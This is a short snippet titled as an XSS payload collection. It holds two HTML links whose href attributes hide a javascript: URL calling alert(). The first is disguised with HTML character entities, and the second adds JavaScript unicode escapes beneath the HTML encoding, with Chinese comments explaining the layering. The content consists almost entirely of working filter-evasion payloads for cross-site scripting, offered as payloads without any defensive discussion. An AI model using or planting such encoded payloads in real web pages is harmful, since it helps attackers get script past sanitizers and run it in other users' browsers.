XSS-Payload-JS-pseudo-protocol

by zicai

HTML

<!-- JavaScript 伪协议 + HTML 编码 -->
<a href="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&colon;&#x61;&#x6C;&#x65;&#x72;&#x74;&lpar;&apos;&#x61;&#x2D;&#x68;&#x72;&#x65;&#x66;&apos;&rpar;">click me</a>


<!-- 
先 JavaScript 编码为
javascript:\u0061\u006C\u0065\u0072\u0074('a-href')
在 HTML 编码
-->
<a href="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&colon;&bsol;&#x75;&#x30;&#x30;&#x36;&#x31;&bsol;&#x75;&#x30;&#x30;&#x36;&#x43;&bsol;&#x75;&#x30;&#x30;&#x36;&#x35;&bsol;&#x75;&#x30;&#x30;&#x37;&#x32;&bsol;&#x75;&#x30;&#x30;&#x37;&#x34;&lpar;&apos;&#x61;&#x2D;&#x68;&#x72;&#x65;&#x66;&apos;&rpar;">click me</a>